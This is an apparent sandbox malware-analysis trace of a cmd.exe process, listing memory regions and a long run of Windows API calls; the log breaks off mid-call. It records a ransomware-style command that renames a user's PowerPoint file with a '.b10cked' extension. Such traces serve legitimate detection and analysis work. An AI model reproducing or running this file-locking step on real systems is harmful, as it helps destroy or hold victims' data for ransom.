35080 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 35081 start_va = 0xb0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 35082 start_va = 0x49fb0000 end_va = 0x49ffbfff entry_point = 0x49fb0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 35083 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 35084 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 35085 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 35086 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 35087 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 35450 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 35451 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 35452 start_va = 0x1b0000 end_va = 0x216fff entry_point = 0x1b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 35453 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 35454 start_va = 0x520000 end_va = 0x52ffff entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 35455 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 35456 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 35457 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 35458 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 35459 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 35460 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 35461 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 35462 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 35463 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 35464 start_va = 0x220000 end_va = 0x2e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 35465 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 35466 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 35467 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 35468 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 35469 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 35470 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 35471 start_va = 0x400000 end_va = 0x500fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 35472 start_va = 0x530000 end_va = 0x112ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 35473 start_va = 0x1130000 end_va = 0x1292fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001130000" filename = "" Thread: id = 877 os_tid = 0x794 [0235.110] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1afb6c | out: lpSystemTimeAsFileTime=0x1afb6c*(dwLowDateTime=0xbf990be0, dwHighDateTime=0x1d440a9)) [0235.110] GetCurrentProcessId () returned 0xc24 [0235.110] GetCurrentThreadId () returned 0x794 [0235.110] GetTickCount () returned 0x408e5 [0235.110] QueryPerformanceCounter (in: lpPerformanceCount=0x1afb64 | out: lpPerformanceCount=0x1afb64*=29189967579) returned 1 [0235.111] GetModuleHandleA (lpModuleName=0x0) returned 0x49fb0000 [0235.111] __set_app_type (_Type=0x1) [0235.111] __p__fmode () returned 0x76b331f4 [0235.111] __p__commode () returned 0x76b331fc [0235.111] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49fd21a6) returned 0x0 [0235.111] __getmainargs (in: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c, _DoWildCard=0, _StartInfo=0x49fd4140 | out: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c) returned 0 [0235.111] GetCurrentThreadId () returned 0x794 [0235.111] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x794) returned 0x38 [0235.111] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0235.112] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0235.112] SetThreadUILanguage (LangId=0x0) returned 0x409 [0235.112] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0235.112] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1afafc | out: phkResult=0x1afafc*=0x0) returned 0x2 [0235.112] VirtualQuery (in: lpAddress=0x1afb33, lpBuffer=0x1afacc, dwLength=0x1c | out: lpBuffer=0x1afacc*(BaseAddress=0x1af000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0235.112] VirtualQuery (in: lpAddress=0xb0000, lpBuffer=0x1afacc, dwLength=0x1c | out: lpBuffer=0x1afacc*(BaseAddress=0xb0000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0235.112] VirtualQuery (in: lpAddress=0xb1000, lpBuffer=0x1afacc, dwLength=0x1c | out: lpBuffer=0x1afacc*(BaseAddress=0xb1000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0235.112] VirtualQuery (in: lpAddress=0xb3000, lpBuffer=0x1afacc, dwLength=0x1c | out: lpBuffer=0x1afacc*(BaseAddress=0xb3000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0235.112] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x1afacc, dwLength=0x1c | out: lpBuffer=0x1afacc*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0235.112] GetConsoleOutputCP () returned 0x1b5 [0235.112] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0235.112] SetConsoleCtrlHandler (HandlerRoutine=0x49fce72a, Add=1) returned 1 [0235.112] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.112] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0235.112] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.112] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0235.113] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.113] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0235.113] _get_osfhandle (_FileHandle=0) returned 0x3 [0235.113] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0235.113] _get_osfhandle (_FileHandle=0) returned 0x3 [0235.113] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0235.113] GetEnvironmentStringsW () returned 0x310198* [0235.113] FreeEnvironmentStringsW (penv=0x310198) returned 1 [0235.113] GetEnvironmentStringsW () returned 0x310198* [0235.114] FreeEnvironmentStringsW (penv=0x310198) returned 1 [0235.114] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1aea6c | out: phkResult=0x1aea6c*=0x40) returned 0x0 [0235.114] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1aea74, lpData=0x1aea78, lpcbData=0x1aea70*=0x1000 | out: lpType=0x1aea74*=0x0, lpData=0x1aea78*=0xc0, lpcbData=0x1aea70*=0x1000) returned 0x2 [0235.114] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1aea74, lpData=0x1aea78, lpcbData=0x1aea70*=0x1000 | out: lpType=0x1aea74*=0x4, lpData=0x1aea78*=0x1, lpcbData=0x1aea70*=0x4) returned 0x0 [0235.114] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1aea74, lpData=0x1aea78, lpcbData=0x1aea70*=0x1000 | out: lpType=0x1aea74*=0x0, lpData=0x1aea78*=0x1, lpcbData=0x1aea70*=0x1000) returned 0x2 [0235.114] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1aea74, lpData=0x1aea78, lpcbData=0x1aea70*=0x1000 | out: lpType=0x1aea74*=0x4, lpData=0x1aea78*=0x0, lpcbData=0x1aea70*=0x4) returned 0x0 [0235.114] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1aea74, lpData=0x1aea78, lpcbData=0x1aea70*=0x1000 | out: lpType=0x1aea74*=0x4, lpData=0x1aea78*=0x40, lpcbData=0x1aea70*=0x4) returned 0x0 [0235.114] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1aea74, lpData=0x1aea78, lpcbData=0x1aea70*=0x1000 | out: lpType=0x1aea74*=0x4, lpData=0x1aea78*=0x40, lpcbData=0x1aea70*=0x4) returned 0x0 [0235.114] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1aea74, lpData=0x1aea78, lpcbData=0x1aea70*=0x1000 | out: lpType=0x1aea74*=0x0, lpData=0x1aea78*=0x40, lpcbData=0x1aea70*=0x1000) returned 0x2 [0235.114] RegCloseKey (hKey=0x40) returned 0x0 [0235.114] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1aea6c | out: phkResult=0x1aea6c*=0x40) returned 0x0 [0235.114] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1aea74, lpData=0x1aea78, lpcbData=0x1aea70*=0x1000 | out: lpType=0x1aea74*=0x0, lpData=0x1aea78*=0x40, lpcbData=0x1aea70*=0x1000) returned 0x2 [0235.114] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1aea74, lpData=0x1aea78, lpcbData=0x1aea70*=0x1000 | out: lpType=0x1aea74*=0x4, lpData=0x1aea78*=0x1, lpcbData=0x1aea70*=0x4) returned 0x0 [0235.114] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1aea74, lpData=0x1aea78, lpcbData=0x1aea70*=0x1000 | out: lpType=0x1aea74*=0x0, lpData=0x1aea78*=0x1, lpcbData=0x1aea70*=0x1000) returned 0x2 [0235.114] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1aea74, lpData=0x1aea78, lpcbData=0x1aea70*=0x1000 | out: lpType=0x1aea74*=0x4, lpData=0x1aea78*=0x0, lpcbData=0x1aea70*=0x4) returned 0x0 [0235.114] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1aea74, lpData=0x1aea78, lpcbData=0x1aea70*=0x1000 | out: lpType=0x1aea74*=0x4, lpData=0x1aea78*=0x9, lpcbData=0x1aea70*=0x4) returned 0x0 [0235.114] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1aea74, lpData=0x1aea78, lpcbData=0x1aea70*=0x1000 | out: lpType=0x1aea74*=0x4, lpData=0x1aea78*=0x9, lpcbData=0x1aea70*=0x4) returned 0x0 [0235.114] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1aea74, lpData=0x1aea78, lpcbData=0x1aea70*=0x1000 | out: lpType=0x1aea74*=0x0, lpData=0x1aea78*=0x9, lpcbData=0x1aea70*=0x1000) returned 0x2 [0235.114] RegCloseKey (hKey=0x40) returned 0x0 [0235.114] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863c2 [0235.114] srand (_Seed=0x5b8863c2) [0235.114] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\UFL3TY~1.PPT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\UFl3tyKJKu.ppt.b10cked\"" [0235.115] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\UFL3TY~1.PPT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\UFl3tyKJKu.ppt.b10cked\"" [0235.115] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0235.115] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3118f8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0235.115] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0235.115] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0235.115] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0235.115] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0235.115] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0235.115] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0235.115] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0235.115] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0235.115] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0235.115] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0235.115] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0235.115] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0235.116] GetEnvironmentStringsW () returned 0x3122e8* [0235.116] FreeEnvironmentStringsW (penv=0x3122e8) returned 1 [0235.116] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0235.116] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0235.116] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0235.116] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0235.116] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0235.116] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0235.116] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0235.116] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0235.116] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0235.116] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0235.116] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1af838 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0235.116] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1af838, lpFilePart=0x1af834 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1af834*="Desktop") returned 0x18 [0235.116] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0235.116] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1af5b4 | out: lpFindFileData=0x1af5b4) returned 0x310028 [0235.116] FindClose (in: hFindFile=0x310028 | out: hFindFile=0x310028) returned 1 [0235.117] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1af5b4 | out: lpFindFileData=0x1af5b4) returned 0x310028 [0235.117] FindClose (in: hFindFile=0x310028 | out: hFindFile=0x310028) returned 1 [0235.117] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1af5b4 | out: lpFindFileData=0x1af5b4) returned 0x310028 [0235.117] FindClose (in: hFindFile=0x310028 | out: hFindFile=0x310028) returned 1 [0235.117] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0235.117] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0235.117] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0235.117] GetEnvironmentStringsW () returned 0x312b08* [0235.117] FreeEnvironmentStringsW (penv=0x312b08) returned 1 [0235.117] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0235.118] GetConsoleOutputCP () returned 0x1b5 [0235.118] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0235.118] GetUserDefaultLCID () returned 0x409 [0235.118] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49fd4950, cchData=8 | out: lpLCData=":") returned 2 [0235.118] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1af978, cchData=128 | out: lpLCData="0") returned 2 [0235.118] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1af978, cchData=128 | out: lpLCData="0") returned 2 [0235.118] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1af978, cchData=128 | out: lpLCData="1") returned 2 [0235.118] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49fd4940, cchData=8 | out: lpLCData="/") returned 2 [0235.118] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49fd4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0235.119] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49fd4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0235.119] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49fd4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0235.119] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49fd4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0235.119] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49fd4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0235.119] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49fd4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0235.119] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49fd4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0235.119] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49fd4930, cchData=8 | out: lpLCData=".") returned 2 [0235.119] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49fd4920, cchData=8 | out: lpLCData=",") returned 2 [0235.119] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0235.120] GetConsoleTitleW (in: lpConsoleTitle=0x3008f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0235.120] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0235.120] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0235.120] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0235.120] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0235.121] _wcsicmp (_String1="move", _String2=")") returned 68 [0235.121] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0235.121] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0235.121] _wcsicmp (_String1="IF", _String2="move") returned -4 [0235.121] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0235.121] _wcsicmp (_String1="REM", _String2="move") returned 5 [0235.121] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0235.124] GetConsoleTitleW (in: lpConsoleTitle=0x1af670, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0235.124] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0235.124] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0235.124] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0235.124] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0235.124] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0235.124] _wcsicmp (_String1="move", _String2="CD") returned 10 [0235.124] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0235.124] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0235.124] _wcsicmp (_String1="move", _String2="REN") returned -5 [0235.124] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0235.124] _wcsicmp (_String1="move", _String2="SET") returned -6 [0235.124] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0235.124] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0235.124] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0235.124] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0235.124] _wcsicmp (_String1="move", _String2="MD") returned 11 [0235.124] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0235.124] _wcsicmp (_String1="move", _String2="RD") returned -5 [0235.124] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0235.124] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0235.124] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0235.124] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0235.124] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0235.124] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0235.124] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0235.124] _wcsicmp (_String1="move", _String2="VER") returned -9 [0235.124] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0235.124] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0235.124] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0235.124] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0235.125] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0235.125] _wcsicmp (_String1="move", _String2="START") returned -6 [0235.125] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0235.125] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0235.125] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0235.126] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0235.126] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0235.126] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1af42c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1af424, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1af424*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0235.127] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0235.127] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0235.127] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0235.127] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0235.127] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0235.127] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0235.127] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0235.127] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0235.127] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0235.127] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0235.127] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0235.127] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0235.127] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0235.127] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0235.127] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0235.127] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0235.127] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0235.127] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0235.127] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0235.127] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0235.127] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0235.127] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0235.127] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0235.127] _wcsnicmp (_String1="COPYCMD", 